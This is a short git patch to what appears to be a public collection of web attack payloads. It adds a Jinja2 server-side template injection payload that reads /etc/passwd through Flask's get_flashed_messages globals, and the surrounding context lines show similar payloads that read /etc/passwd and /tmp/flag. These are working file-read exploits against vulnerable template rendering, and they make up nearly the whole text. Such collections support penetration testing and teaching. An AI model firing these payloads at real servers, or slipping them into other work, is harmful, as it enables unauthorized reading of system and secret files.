From 89429f9c4f302d33072d9f3ea28153ca3f95f9f5 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E3=83=A0=E3=83=8F=E3=83=B3=E3=83=9E=E3=83=89?=
Date: Mon, 18 Jan 2021 11:48:38 +0300
Subject: [PATCH] SSTI Payload in Jinja2 - Arbitrary file read

---
 Server Side Template Injection/README.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index e8ad1da..fc4e7c0 100644
--- a/Server Side Template Injection/README.md
+++ b/Server Side Template Injection/README.md
@@ -381,6 +381,8 @@ Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
 # ''.__class__.__mro__[2].__subclasses__()[40] = File class
 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
 {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }}
+# https://github.com/pallets/flask/blob/master/src/flask/helpers.py#L398
+{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
 ```
 ### Jinja2 - Write into remote file